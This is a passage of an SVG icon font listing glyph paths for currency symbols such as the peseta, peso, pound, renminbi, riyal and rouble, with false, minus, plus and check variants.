<glyph glyph-name="peseta-plus" horiz-adv-x="1000" unicode="&#xe9f4;" d="M775 181c-22 22-53 36-86 37h-5c-36 0-68-14-91-37-23-23-38-56-38-91 0-18 4-35 11-51 7-15 16-29 27-40 24-23 55-38 91-38 71 0 129 58 129 129-1 35-15 68-38 91z m-30-110h-42v-42h-38v42h-42v38h42v42h38v-42h42v-38z m145 462h-93c-4 42-13 78-29 107-20 39-47 70-80 91s-70 37-111 45c-40 8-81 12-120 12-38 0-76-1-113-3-38-2-74-5-111-8v-244h-123c-2-16-4-33-4-50 0-16 2-33 4-49h123v-516c16-2 31-4 47-5 15 0 28-1 41-1 14 0 28 1 42 1 14 1 29 3 44 5v275c8-1 16-1 25-2 10 0 19 0 30 0 24 0 48 1 73 5 5 7 11 14 18 21 32 32 76 52 125 52 12 0 23-1 34-3 22 20 41 44 57 73 14 26 23 58 27 96h95c2 15 3 32 3 49 0 17-1 33-4 49z m-282-118c-9-19-20-35-35-47-15-12-32-20-51-26-19-5-38-7-58-7h-30c-9 0-18 1-27 2v97h207c-2-6-4-13-6-19z m-201 118v107c14 2 25 3 32 3 8 1 16 1 25 1 20 0 39-3 58-8 19-5 36-14 51-26 14-12 26-29 35-49 4-8 6-18 8-28l-209 0z" />
<glyph glyph-name="peseta-true" horiz-adv-x="1000" unicode="&#xe9f5;" d="M775 181c-23 22-53 36-86 37h-5c-36 0-68-14-91-37-23-23-38-56-38-91 0-18 4-35 11-51 6-15 16-29 27-40 23-23 55-38 91-38 71 0 128 58 128 129 0 35-14 68-37 91z m-24-61l-79-79c-2-2-5-2-7 0l-48 48c-2 2-2 6 0 8l11 11c2 2 6 2 8 0l32-33 64 64c2 2 5 2 7 0l12-12c2-2 2-5 0-7z m139 413h-93c-4 42-13 78-29 107-20 39-47 70-80 91s-70 37-111 45c-40 8-81 12-120 12-38 0-76-1-113-3-38-2-74-5-111-8v-244h-123c-2-16-4-33-4-50 0-16 2-33 4-49h123v-516c16-2 31-4 47-5 15 0 28-1 41-1 14 0 28 1 42 1 14 1 29 3 44 5v275c8-1 16-1 25-2 10 0 19 0 30 0 24 0 48 1 73 5 5 7 11 14 18 21 32 32 76 52 125 52 12 0 23-1 34-3 22 20 41 44 57 73 14 26 23 58 27 96h95c2 15 3 32 3 49 0 17-1 33-4 49z m-282-118c-9-19-20-35-35-47-15-12-32-20-51-26-19-5-38-7-58-7h-30c-9 0-18 1-27 2v97h207c-2-6-4-13-6-19z m-201 118v107c14 2 25 3 32 3 8 1 16 1 25 1 20 0 39-3 58-8 19-5 36-14 51-26 14-12 26-29 35-49 4-8 6-18 8-28l-209 0z" />
<glyph glyph-name="peseta" horiz-adv-x="1000" unicode="&#xe9f6;" d="M891 533h-93c-4 42-14 78-29 107-21 39-48 69-80 91-33 22-70 37-111 45-41 8-81 12-121 12-38 0-75-1-113-3s-74-5-110-8v-244h-124c-2-16-3-33-3-50 0-16 1-33 3-49h124v-516c16-2 31-4 46-4 15-1 29-2 42-2 13 0 27 1 41 2 15 0 29 2 44 4v275c8-1 17-1 26-2 9 0 19 0 29 0 39 0 78 4 118 12 40 8 77 23 109 45 33 22 59 52 80 91 14 26 23 58 27 95h95c2 16 3 33 3 50 0 17-1 33-3 49z m-283-118c-9-20-20-35-35-47-15-12-31-21-50-26-19-5-39-7-59-7h-30c-8 0-17 0-27 2v97h208c-2-7-4-13-7-19z m-30 118h-171v107c15 2 25 3 33 3 7 0 16 1 24 1 20 0 40-3 59-8 19-5 35-14 50-26 15-12 26-29 35-49 4-8 7-18 9-28l-39 0z" />
<glyph glyph-name="peso-false" horiz-adv-x="1000" unicode="&#xe9f7;" d="M845 229c-23 23-53 37-86 38h-5c-36 0-68-14-91-38-24-23-38-55-38-90 0-19 4-36 11-51 6-15 16-29 27-41 23-23 55-37 91-37 71 0 128 58 128 129 0 35-14 67-37 90z m-38-122l-21-21-32 32-32-32-21 21 31 32-31 32 21 21 32-32 32 32 21-21-32-32 32-32z m27 481h-86c-5 19-11 37-19 52-21 39-48 69-81 91s-70 37-110 45c-41 8-81 12-121 12-38 0-76-1-113-3-37-2-74-5-111-8v-189h-75v-54h75v-77h-75v-54h75v-485c16-2 31-4 47-4 15-1 28-2 41-2 14 0 27 1 42 2 14 0 29 2 44 4v275c8 0 16-1 25-2 9 0 19 0 30 0 38 0 78 4 118 12 11 2 22 5 33 8 22 56 75 96 138 99 6 9 12 19 17 29 10 18 18 40 23 64h83v55h-76c1 10 1 20 1 31 0 16 0 31-2 45h77v54z m-467 52c14 2 25 3 33 3 7 1 15 1 24 1 20 0 39-3 58-8 19-5 36-14 51-26 7-6 14-14 20-22h-186v52z m166-272c-15-12-32-21-51-25-19-6-38-8-58-8h-30c-9 0-17 0-27 2v66h194c-8-14-17-26-28-35z m45 89h-211v77h209c3-15 5-30 5-47 0-11-1-20-3-30z" />
<glyph glyph-name="peso-minus" horiz-adv-x="1000" unicode="&#xe9f8;" d="M845 229c-23 23-53 37-86 38h-5c-36 0-68-14-91-38-24-23-38-55-38-90 0-19 4-36 11-51 6-15 16-29 27-41 23-23 55-37 91-37 71 0 128 58 128 129 0 35-14 67-37 90z m-32-107h-119v34h119v-34z m21 466h-86c-5 19-11 37-19 53-21 38-48 69-81 90s-70 37-110 45c-41 8-81 12-121 12-38 0-76-1-113-3-38-2-74-5-111-8v-189h-75v-54h75v-77h-75v-54h75v-485c16-2 31-4 47-4 15-1 28-1 41-1 14 0 27 0 42 1 14 0 29 2 44 4v275c8 0 16-1 25-2 9 0 19 0 30 0 38 0 78 4 118 12 11 2 22 5 33 8 22 56 75 96 138 99 6 9 12 19 17 29 10 19 18 40 23 64h83v55h-76c1 10 1 20 1 31 0 16 0 31-2 45h77v54h0z m-467 52c14 2 25 3 33 3 7 1 15 1 24 1 20 0 39-3 58-8 19-5 36-14 51-26 7-6 14-14 20-22h-186v52z m166-272c-15-12-32-21-51-25-19-6-38-8-58-8h-30c-9 0-17 0-27 2v66h194c-8-14-17-26-28-35z m45 90h-211v76h209c3-15 5-30 5-47 0-11-1-20-3-29z" />
<glyph glyph-name="peso-plus" horiz-adv-x="1000" unicode="&#xe9f9;" d="M845 229c-22 23-53 37-87 38h-4c-36 0-68-14-91-38-23-23-38-55-38-90 0-19 4-36 11-51 6-15 15-29 27-41 23-23 55-37 91-37 71 0 129 58 129 129-1 35-15 67-38 90z m-30-109h-43v-42h-37v42h-42v38h42v42h37v-42h43v-38z m19 468h-86c-5 19-11 37-19 53-21 38-48 69-81 90-33 22-70 37-110 45-41 8-81 12-121 12-38 0-76-1-113-3-37-2-74-5-111-8v-189h-75v-54h75v-77h-75v-54h75v-485c16-2 32-4 47-4 15-1 29-1 42-1 13 0 27 0 41 1 14 0 29 2 44 4v275c8 0 16-1 26-2 9 0 18 0 29 0 39 0 78 4 118 12 11 2 22 5 33 8 22 56 75 96 138 99 6 9 12 19 17 29 11 19 18 40 23 64h83v55h-76c1 10 2 20 2 31 0 16-1 31-2 45h76v54h0z m-467 52c14 2 25 3 33 3 7 1 15 1 24 1 20 0 39-3 58-8 19-5 36-14 51-26 7-6 14-14 20-22h-186v52z m166-272c-15-12-32-21-51-25-19-6-38-8-58-8h-30c-9 0-17 0-27 2v66h194c-8-14-17-26-28-35z m45 90h-211v76h209c3-15 5-30 5-47 0-11-1-20-3-29z" />
<glyph glyph-name="peso-true" horiz-adv-x="1000" unicode="&#xe9fa;" d="M845 229c-23 23-53 37-86 38h-5c-36 0-68-14-91-38-24-23-38-55-38-90 0-19 4-36 11-51 6-15 16-29 27-41 23-23 55-37 91-37 71 0 128 58 128 129 0 35-14 67-37 90z m-24-60l-79-79c-2-2-5-2-7 0l-48 48c-3 2-3 6 0 8l11 11c2 2 6 2 8 0l32-32 64 63c2 2 5 2 7 0l12-12c2-2 2-5 0-7z m13 419h-86c-5 19-11 37-19 52-21 39-48 69-81 91-33 22-70 37-110 45-41 8-81 12-121 12-38 0-76-1-113-3-37-2-74-5-111-8v-189h-75v-54h75v-77h-75v-54h75v-485c16-2 31-4 47-4 15-1 28-1 41-1 14 0 27 0 42 1 14 0 29 2 44 4v275c8 0 16-1 25-2 9 0 19 0 30 0 38 0 78 4 118 12 11 2 22 5 33 8 22 56 75 96 138 99 6 9 12 19 17 29 10 18 18 40 23 64h83v55h-76c1 10 1 20 1 31 0 16 0 31-2 45h77v54h0z m-467 52c14 2 25 3 33 3 7 1 15 1 24 1 20 0 39-3 58-8 19-5 36-14 51-26 7-6 14-14 20-22h-186v52z m166-272c-15-12-32-21-51-25-19-6-38-8-58-8h-30c-9 0-17 0-27 2v66h194c-8-14-17-26-28-35z m45 89h-211v77h209c3-15 5-30 5-47 0-11-1-20-3-30z" />
<glyph glyph-name="peso" horiz-adv-x="1000" unicode="&#xe9fb;" d="M858 588h-86c-5 19-11 37-20 52-20 39-47 69-80 91s-70 37-110 45c-41 8-82 12-121 12-38 0-76-2-113-3-38-2-74-5-111-8v-189h-75v-55h75v-76h-75v-54h75v-485c16-2 32-4 47-5 15 0 29-1 41-1 14 0 28 1 42 1 14 1 29 3 44 5v275c8-1 17-1 26-2 9 0 18 0 29 0 39 0 78 4 118 12 40 8 76 23 109 45 32 22 59 52 79 91 10 18 18 40 23 64h84v55h-77c1 10 1 20 1 31 0 16 0 30-2 45h77l0 54z m-467 52c14 2 25 3 33 3 7 1 15 1 24 1 20 0 39-3 58-8 19-5 36-14 51-26 7-6 14-14 20-22h-186v52z m166-272c-15-12-32-20-51-26-19-5-38-7-58-7h-30c-9 0-18 0-27 2v66h194c-8-14-17-26-28-35z m48 119c0-11-1-20-3-30h-211v76h209c3-14 5-29 5-46z" />
<glyph glyph-name="pound-false" horiz-adv-x="1000" unicode="&#xe9fc;" d="M840 157c-23 22-53 36-87 38h-5c-35 0-67-15-90-38-24-23-38-56-38-91 0-18 4-35 11-51 6-15 15-29 27-40 23-23 55-38 90-38 72 0 129 58 129 129 0 35-14 68-37 91z m-39-123l-21-21-32 32-32-32-21 21 32 32-32 32 21 21 32-32 32 32 21-21-31-32 31-32z m-408 520c-5-16-7-32-7-47 0-24 2-44 3-61 2-17 5-34 8-51h190c2-13 4-25 5-36 1-10 1-21 1-32 0-11 0-21-1-31-1-10-3-21-5-33h-169c1-6 2-13 2-20 1-8 2-15 2-21 0-28-2-53-7-77-3-24-13-51-26-79h185c-1-5-1-9-1-14 0-63 39-117 95-140h-527l-5 18 15 13c18 15 32 32 44 53 11 22 21 44 28 66 8 23 13 45 17 67 3 21 5 39 5 54 0 13 0 26-2 39-1 14-2 27-4 41h-109c-3 13-5 25-5 35-1 11-2 22-2 33 0 11 1 21 2 31 0 9 2 20 5 33h89c-4 21-6 42-9 62-1 21-3 42-3 63 0 33 6 66 18 98 12 32 30 61 54 86 25 25 55 45 92 61 37 15 81 23 132 23 45 0 82-4 113-10 31-7 60-16 88-27-2-19-5-40-11-65-6-25-15-50-28-76-23 9-45 17-66 23-21 7-48 10-80 10-25 0-46-5-64-13-17-9-30-19-40-32-10-13-17-28-22-44z" />
<glyph glyph-name="pound-minus" horiz-adv-x="1000" unicode="&#xe9fd;" d="M840 157c-23 22-53 36-87 38h-5c-35 0-67-15-90-38-24-23-38-56-38-91 0-18 4-35 11-51 6-15 15-29 27-40 23-23 55-38 90-38 72 0 129 58 129 129 0 35-14 68-37 91z m-32-108h-119v34h119v-34z m-415 505c-5-16-7-32-7-47 0-24 2-44 3-61 2-17 5-34 8-51h190c2-13 4-25 5-36 1-10 1-21 1-32 0-11 0-21-1-31-1-10-3-21-5-33h-169c1-6 2-13 2-20 1-8 2-15 2-21 0-28-2-53-7-77-3-24-13-51-26-79h185c-1-5-1-9-1-14 0-63 39-117 95-140h-527l-5 18 15 13c18 15 32 32 44 53 11 22 21 44 28 66 8 23 13 45 17 67 3 21 5 39 5 54 0 13 0 26-2 39-1 14-2 27-4 41h-109c-3 13-5 25-5 35-1 11-2 22-2 33 0 11 1 21 2 31 0 9 2 20 5 33h89c-4 21-6 42-9 62-1 21-3 42-3 63 0 33 6 66 18 98 12 32 30 61 54 86 25 25 55 45 92 61 37 15 81 23 132 23 45 0 82-4 113-10 31-7 60-16 88-27-2-19-5-40-11-65-6-25-15-50-28-76-23 9-45 17-66 23-21 7-48 10-80 10-25 0-46-5-64-13-17-9-30-19-40-32-10-13-17-28-22-44z" />
<glyph glyph-name="pound-plus" horiz-adv-x="1000" unicode="&#xe9fe;" d="M839 157c-22 22-52 36-86 38h-5c-35 0-67-15-91-38-23-23-38-56-38-91 0-18 4-35 11-51 7-15 16-29 27-40 24-23 56-38 91-38 71 0 129 58 129 129 0 35-14 68-38 91z m-30-110h-42v-42h-37v42h-42v38h42v42h37v-42h42v-38z m-416 507c-5-16-7-32-7-47 0-24 2-44 3-61 2-17 5-34 8-51h190c2-13 4-25 5-36 1-10 1-21 1-32 0-11 0-21-1-31-1-10-3-21-5-33h-169c1-6 2-13 2-20 1-8 2-15 2-21 0-28-2-53-7-77-3-24-13-51-26-79h185c-1-5-1-9-1-14 0-63 39-117 95-140h-527l-5 18 15 13c18 15 32 32 44 53 11 22 21 44 28 66 8 23 13 45 17 67 3 21 5 39 5 54 0 13 0 26-2 39-1 14-2 27-4 41h-109c-3 13-5 25-5 35-1 11-2 22-2 33 0 11 1 21 2 31 0 9 2 20 5 33h89c-4 21-6 42-9 62-1 21-3 42-3 63 0 33 6 66 18 98 12 32 30 61 54 86 25 25 55 45 92 61 37 15 81 23 132 23 45 0 82-4 113-10 31-7 60-16 88-27-2-19-5-40-11-65-6-25-15-50-28-76-23 9-45 17-66 23-21 7-48 10-80 10-25 0-46-5-64-13-17-9-30-19-40-32-10-13-17-28-22-44z" />
<glyph glyph-name="pound-true" horiz-adv-x="1000" unicode="&#xe9ff;" d="M837 164c-23 22-53 36-86 38h-5c-36 0-68-15-91-38-24-23-38-56-38-91 0-18 4-36 11-51 6-15 16-29 27-40 23-23 55-38 91-38 71 0 128 58 128 129 0 35-14 68-37 91z m-24-61l-79-79c-2-2-6-2-8 0l-47 48c-3 2-3 6 0 8l11 11c2 2 6 2 8 0l32-32 64 63c2 2 5 2 7 0l12-12c2-2 2-5 0-7z m-417 451c-5-16-7-32-7-47 0-24 1-44 3-61 2-17 5-34 8-51h190c2-13 4-25 5-36 0-10 1-21 1-32 0-11-1-21-1-31-1-10-3-21-5-33h-169c0-6 1-13 2-20 1-8 1-15 1-21 0-28-2-53-6-77-4-24-13-51-27-79h185c0-5 0-9 0-14 0-63 39-117 94-140h-527l-5 18 16 13c17 15 32 32 43 53 12 22 21 44 29 66 7 23 13 45 16 67 4 21 6 39 6 54 0 13-1 26-2 39-1 14-3 27-4 41h-110c-2 13-4 25-5 35-1 11-1 22-1 33 0 11 0 21 1 31 1 9 3 20 5 33h89c-3 21-6 42-8 62-2 21-3 42-3 63 0 33 6 66 18 98 11 32 30 61 54 86 24 25 55 45 92 61 37 15 81 23 132 23 44 0 82-4 113-10 31-7 60-16 88-27-2-19-6-40-12-65-5-25-15-50-28-76-22 9-44 17-65 23-21 7-48 10-81 10-25 0-46-5-63-13-17-9-31-19-41-32-10-13-17-28-21-44z" />
<glyph glyph-name="pound" horiz-adv-x="1000" unicode="&#xea00;" d="M791 26c0 13-2 26-4 40h-314c13 28 22 54 26 78 4 24 7 50 7 78 0 6-1 13-2 20 0 8-1 15-2 21h169c2 12 4 23 5 33 1 10 1 20 1 30 0 12 0 23-1 33-1 11-2 22-5 35h-190c-3 18-6 34-8 52-2 17-3 37-3 60 0 16 2 32 7 48s11 31 22 44c10 12 23 23 40 32 17 8 38 13 64 13 32 0 59-4 80-10 21-7 43-14 66-23 13 26 22 51 28 76s9 46 11 65c-28 11-57 20-88 27-31 6-68 9-113 9-51 0-95-7-132-23s-67-35-92-60-42-54-54-86c-12-32-18-65-18-98 0-21 1-42 3-63 2-21 5-41 8-62h-88c-3-13-4-24-5-33-1-10-2-20-2-31 0-11 1-22 2-33s2-22 5-35h109c2-14 3-27 4-41 2-13 2-26 2-39 0-15-2-33-5-54-4-22-9-44-17-67-7-22-17-44-28-66-12-21-27-38-44-53l-15-13 5-18h562c2 14 4 27 5 40 0 13 1 25 1 38 0 12-1 24-2 36z" />
<glyph glyph-name="renminbi-false" horiz-adv-x="1000" unicode="&#xea01;" d="M902 216c-21 21-49 34-81 36h-5c-33 0-64-14-85-36-23-22-36-52-36-86 0-17 4-33 10-48 6-14 15-27 26-38 21-21 52-35 85-35 67 0 122 54 122 121 0 34-14 64-36 86z m-36-116l-20-20-30 30-30-30-20 20 30 30-30 31 20 20 30-31 30 31 20-20-30-31 30-30z m-324 148l0-105c0-43 22-68 59-69 20-1 37 4 49 16 7-41 31-77 66-98-24-24-55-41-90-46-86-14-179 54-190 148-9 80-6 163-7 244-1 19 0 39 0 60h-50c-19-86-32-170-58-251-26-83-87-145-152-204-24 25-47 49-73 77 111 98 147 230 156 379h-189v136h665v-134h-186v-153z m132 423c1 28 0 56 0 86h-555v-113h553c1 10 2 18 2 27z" />
<glyph glyph-name="renminbi-minus" horiz-adv-x="1000" unicode="&#xea02;" d="M902 216c-21 21-49 34-81 36h-5c-33 0-64-14-85-36-23-22-36-52-36-86 0-17 4-33 10-48 6-14 15-27 26-38 21-21 52-35 85-35 67 0 122 54 122 121 0 34-14 64-36 86z m-30-102h-112v32h112v-32z m-330 134l0-105c0-43 22-68 59-69 20-1 37 5 49 17 7-42 31-78 66-99-24-24-55-41-90-46-86-14-179 54-190 148-9 81-6 163-8 244 0 19 0 39 0 60h-49c-19-86-32-170-58-251-27-83-87-145-152-204-24 25-47 49-73 77 111 98 147 230 156 379h-189v136h665v-134h-186v-153z m132 423c1 28 0 56 0 86h-555v-113h553c1 10 2 18 2 27z" />
<glyph glyph-name="renminbi-plus" horiz-adv-x="1000" unicode="&#xea03;" d="M902 216c-21 21-50 35-81 36h-5c-33 0-63-14-86-36-21-22-35-52-35-85 0-18 4-34 10-49 6-14 15-27 25-37 23-22 53-36 86-36 67 0 122 55 122 122 0 33-14 63-36 85z m-28-103h-40v-40h-35v40h-40v35h40v40h35v-40h40v-35z m-332 135l0-105c0-43 22-67 59-69 20-1 37 5 49 17 6-42 31-78 66-99-24-24-55-40-90-46-86-13-179 54-190 148-9 81-6 163-8 244 0 20 0 39 0 60h-49c-19-85-32-170-58-251-27-83-87-145-152-204-24 25-47 50-73 78 111 97 147 229 156 379h-189v135h665v-134h-186v-153z m132 423c1 28 0 56 0 86h-555v-113h552c2 10 3 18 3 27z" />
<glyph glyph-name="renminbi-true" horiz-adv-x="1000" unicode="&#xea04;" d="M902 216c-21 21-49 34-81 36h-5c-33 0-64-14-85-36-22-22-36-52-36-86 0-17 4-33 10-48 6-14 15-27 26-38 22-21 52-35 85-35 68 0 122 54 122 121 0 34-14 64-36 86z m-22-57l-75-75c-2-2-5-2-7 0l-45 46c-2 2-2 5 0 7l11 11c2 2 5 2 7 0l31-31 59 59c3 3 6 3 8 0l11-10c1-2 1-6 0-7z m-338 89l0-105c0-43 22-68 59-69 20-1 37 4 49 16 7-41 31-77 66-98-24-24-55-41-90-46-86-14-179 54-190 148-9 80-6 163-8 244 0 19 0 39 0 60h-49c-19-86-32-170-58-251-27-83-87-145-152-204-24 25-47 49-73 77 111 98 147 230 156 379h-189v136h665v-134h-186v-153z m132 423c1 28 0 56 0 86h-555v-113h553c1 10 2 18 2 27z" />
<glyph glyph-name="renminbi" horiz-adv-x="1000" unicode="&#xea05;" d="M878 135h-103c-1-6-1-9-1-13-6-46-33-71-75-69-40 2-63 29-63 75 0 37 0 75 0 112v165h200v144h-716v-146h204c-9-161-48-302-168-407 29-30 54-57 79-84 70 64 135 131 164 220 27 87 41 178 62 270h53c0-23 0-44 0-64 2-88-2-176 8-263 12-101 112-174 204-159 99 16 166 111 152 219z m-100 560c0 30 0 60 0 93h-597v-122h594c1 11 3 20 3 29z" />
<glyph glyph-name="riyal-false" horiz-adv-x="1000" unicode="&#xea06;" d="M319 190c0 35-14 67-37 90-23 23-53 37-86 38h-5c-36 0-68-14-91-38-23-23-37-55-37-90 0-19 3-36 10-51 7-15 16-29 27-40 23-24 55-38 91-38 71 0 128 58 128 129z m-75-32l-21-21-32 31-32-31-21 21 31 32-31 31 21 22 32-32 32 32 21-22-32-31 32-32z m618-111l-43-61c26-18 52-37 76-59 16 18 31 36 42 60-23 23-48 43-75 60z m-49 37c43 0 75 20 96 56 19 32 28 64 28 96 0 31-14 77-38 129h-4c-17-22-31-44-44-65 21-41 37-79 41-111-13-11-32-18-58-18-23 0-44 6-59 17-30 23-46 56-46 142l-2 116c30 17 61 29 93 29 38 0 69-16 74-59l9-3c10 29 16 59 16 84 0 46-34 68-77 68-35 0-74-16-113-43h-3c0 99-4 188-15 259l-6 1c-15-19-28-38-41-60 8-98 14-173 17-232-26-21-51-45-77-71h-3l-8 158 45 43c-34 44-55 85-55 117 0 9 0 16 2 25l-8 4c-24-26-52-73-52-97 0-18 10-45 16-72 6-56 12-135 17-220-53-59-99-98-140-98-14 0-35 5-49 28-7 12-12 31-12 56 0 42 22 94 63 157l-17 12c-55-75-84-149-84-222 0-8 0-15 1-23 5-33 19-60 39-77 15-12 32-19 51-19 47 0 81 29 133 88 9 10 14 17 20 24l2-2c4-48 6-97 6-149-4-18-20-38-50-62-36-28-76-48-130-48-35 0-64 14-84 37-12-19-38-37-62-36 22-62 73-95 146-95 75 0 149 43 194 111 16 52 25 108 25 166 0 43-1 83-3 121 23 25 48 50 75 73l3-2c2-55 5-107 5-156 0-120 52-177 123-177z m-71-48l-45-61c26-16 53-35 79-57 17 18 33 38 45 60-24 23-50 43-79 58z" />
<glyph glyph-name="riyal-minus" horiz-adv-x="1000" unicode="&#xea07;" d="M319 188c0 35-14 68-37 91-23 22-53 36-86 37h-5c-36 0-68-14-91-37-23-24-37-56-37-91 0-18 3-36 10-51 7-15 16-29 27-40 23-23 55-38 91-38 71 1 128 58 128 129z m-69-17h-118v34h118v-34z m563-87c43 0 75 20 96 56 19 32 28 64 28 96 0 31-14 77-38 129h-4c-17-22-31-44-44-65 21-41 37-79 41-111-13-11-32-18-58-18-23 0-44 6-59 17-30 23-46 56-46 142l-2 116c30 17 61 29 93 29 38 0 69-16 74-59l9-3c10 29 16 59 16 84 0 46-34 68-77 68-35 0-74-16-113-43h-3c0 99-4 188-15 259l-6 1c-15-19-28-38-41-60 8-98 14-173 17-232-26-21-51-45-77-71h-3l-8 158 45 43c-34 44-55 85-55 117 0 9 0 16 2 25l-8 4c-24-26-52-73-52-97 0-18 10-45 16-72 6-56 12-135 17-220-53-59-99-98-140-98-14 0-35 5-49 28-7 12-12 31-12 56 0 42 22 94 63 157l-17 12c-55-75-84-149-84-222 0-8 0-15 1-23 5-33 19-60 39-77 15-12 32-19 51-19 47 0 81 29 133 88 9 10 14 17 20 24l2-2c4-48 6-97 6-149-4-18-20-38-50-62-36-28-76-48-130-48-35 0-64 14-84 37-12-19-38-37-62-36 22-62 73-95 146-95 75 0 149 43 194 111 16 52 25 108 25 166 0 43-1 83-3 121 23 25 48 50 75 73l3-2c2-55 5-107 5-156 0-120 52-177 123-177z m49-37l-43-61c26-18 52-37 76-59 16 18 31 36 42 60-23 23-48 43-75 60z m-120-11l-45-61c26-16 53-35 79-57 17 18 33 38 45 60-24 23-50 43-79 58z" />
<glyph glyph-name="riyal-plus" horiz-adv-x="1000" unicode="&#xea08;" d="M320 188c0 35-15 67-38 90-22 23-53 37-86 38h-5c-36 0-67-14-91-38-23-23-37-55-37-90 0-19 3-36 10-51 7-15 16-29 27-40 24-23 55-38 91-38 71 0 129 58 129 129z m-68-19h-42v-42h-38v42h-42v38h42v41h38v-41h42v-38z m561-85c43 0 75 20 96 56 19 32 28 64 28 95 0 31-14 78-38 130h-4c-17-22-31-44-44-66 21-41 37-79 41-110-13-12-32-18-58-18-23 0-44 6-59 16-30 23-47 57-47 143l-1 115c30 18 61 30 92 30 39 0 70-16 75-60l9-2c10 29 16 58 16 83 0 46-34 69-78 69-34 0-73-16-113-44h-2c0 100-4 189-15 259l-6 2c-15-19-29-38-42-60 9-98 15-173 18-233-26-20-51-44-77-70h-3l-8 158 45 43c-34 44-55 85-55 117 0 9 0 16 2 25l-8 4c-24-26-52-73-52-97 0-18 10-45 16-72 6-57 12-135 17-220-53-59-99-98-140-98-14 0-35 4-49 27-7 12-12 31-12 57 0 42 22 94 63 157l-18 12c-54-75-84-149-84-222 0-8 1-16 2-23 5-33 19-60 39-77 15-13 32-19 51-19 47 0 81 29 133 88 9 10 14 17 20 24l2-2c4-48 6-98 6-149-4-18-20-38-50-62-36-28-76-48-130-48-35 0-64 14-84 36-12-18-38-37-62-36 22-62 73-95 146-95 75 0 149 44 194 111 16 53 25 109 25 167 0 43-1 83-3 121 23 25 48 50 75 73l3-2c2-55 5-107 5-156 0-120 52-177 123-177z m49-38l-43-60c26-18 52-38 76-60 16 18 31 36 43 60-24 23-49 43-76 60z m-120-10l-45-61c26-17 53-35 78-58 18 18 34 39 46 61-24 23-50 42-79 58z" />
<glyph glyph-name="riyal-true" horiz-adv-x="1000" unicode="&#xea09;" d="M319 189c0 36-14 68-37 91-23 23-53 37-86 38h-5c-36 0-68-14-91-38-23-23-37-55-37-90 0-19 3-36 10-51 6-15 16-29 27-40 23-24 55-38 91-38 71 0 128 58 128 128z m-61 30l-79-78c-2-2-5-2-7 0l-48 48c-2 2-2 5 0 7l11 12c2 2 6 2 8 0l33-33 63 63c2 2 5 2 7 0l12-11c2-2 2-6 0-8z m604-172l-43-61c26-18 52-37 76-59 16 18 31 36 43 60-24 23-49 43-76 60z m-165-72c26-16 53-35 79-57 17 18 33 38 45 60-24 23-50 43-79 58l-45-61z m116 109c43 0 75 20 96 56 19 32 28 64 28 96 0 31-14 77-38 129h-4c-17-22-31-44-44-65 21-41 37-79 41-111-13-11-32-18-58-18-23 0-44 6-59 17-30 23-47 56-47 142l-1 116c30 17 61 29 92 29 39 0 70-16 75-59l9-3c10 29 16 59 16 84 0 46-34 68-77 68-35 0-74-16-114-43h-2c0 99-4 188-15 259l-6 1c-15-19-28-38-41-60 8-98 14-173 17-232-26-21-51-45-77-71h-3l-8 158 45 43c-34 44-54 85-54 117 0 9 0 16 1 25l-8 4c-24-26-52-73-52-97 0-18 10-45 16-72 6-56 12-135 18-220-54-59-100-98-141-98-14 0-35 5-48 28-8 12-13 31-13 56 0 42 22 94 63 157l-17 12c-55-75-84-149-84-222 0-8 0-15 1-23 5-33 19-60 39-77 15-12 33-19 51-19 47 0 81 29 133 88 9 10 14 17 20 24l2-2c4-48 6-97 6-149-4-18-20-38-50-62-36-28-76-48-130-48-35 0-64 14-84 37-12-19-37-37-62-36 23-62 73-95 146-95 75 0 149 43 194 111 16 52 25 108 25 166 0 43-1 83-3 121 23 25 48 50 76 73l2-2c2-55 5-107 5-156 0-120 52-177 123-177z" />
<glyph glyph-name="riyal" horiz-adv-x="1000" unicode="&#xea0a;" d="M804 416c-5 45-35 61-73 61-30 0-61-13-91-30l2-117c0-87 16-121 46-144 14-11 35-17 58-17 25 0 44 7 57 18-4 32-20 71-41 112 13 22 27 44 44 66h4c23-52 37-99 37-131 0-32-9-64-27-96-21-37-53-57-95-57-70 0-121 57-121 179 0 50-3 103-5 158l-2 2c-27-23-52-48-74-73 1-39 2-80 2-123 0-59-8-115-24-168-44-69-117-113-191-113-99 0-157 77-157 185 0 51 15 109 50 172l18-10c-21-46-29-85-29-118 0-72 47-133 118-133 53 0 92 20 128 49 29 24 45 44 49 62 0 52-2 102-6 151l-2 1c-6-6-11-13-20-24-51-59-84-89-130-89-49 0-90 50-90 121 0 74 29 149 82 224l18-12c-41-63-63-116-63-159 0-26 5-45 13-57 13-23 34-28 48-28 39 0 85 40 138 99-6 87-11 166-17 223-7 28-16 55-16 73 0 24 27 72 51 99l8-5c-2-9-2-17-2-25 0-33 20-74 54-119l-44-43 8-160h2c26 26 51 50 76 71-3 60-9 137-17 236 13 21 26 41 40 60l6-1c12-71 15-162 15-262h2c40 27 77 43 112 43 42 0 76-22 76-69 0-25-6-55-16-85l-9 3z m-148-384c27-16 53-35 77-59-12-22-27-42-45-61-25 23-51 42-77 59l45 61z m117 11c27-17 52-37 74-61-11-24-26-43-41-61-24 23-49 42-75 61l42 61z" />
<glyph glyph-name="rouble-false" horiz-adv-x="1000" unicode="&#xea0b;" d="M780 148c-22 23-52 36-85 38h-5c-35 0-67-14-90-38-23-22-38-54-38-89 0-18 4-36 11-51 6-15 16-28 27-40 23-23 55-37 90-37 70 0 127 57 127 128 0 35-14 67-37 89z m-38-121l-21-21-31 32-32-32-21 21 31 32-31 31 21 21 32-31 31 31 21-21-31-31 31-32z m-5 634c-17 33-40 59-68 78-28 19-59 32-94 39-34 6-69 10-102 10-33 0-65-1-96-3-32-2-64-4-95-6v-384h-94c-4-20-6-41-6-62 0-21 2-41 6-61h94v-87h-94c-4-20-6-40-6-62 0-20 2-40 6-60h94v-146c14-2 27-3 40-4 12 0 24-1 35-1 12 0 23 1 35 1 13 1 25 2 38 4v146h84c0 2 0 3 0 5 0 43 17 82 45 110 3 3 5 5 8 8h-137v86h1c33 0 106 2 146 12 34 8 65 20 93 39 28 19 50 45 68 78 17 33 26 77 26 130 0 53-9 96-27 130z m-136-194c-7-17-17-31-30-41-12-10-27-19-43-24-16-4-36-9-98-7v266c12 1 21 2 28 2 6 1 13 1 21 1 16 0 33-3 49-7 16-4 30-12 43-23 13-10 23-24 30-41 7-18 11-39 11-65 0-24-4-45-11-61z" />
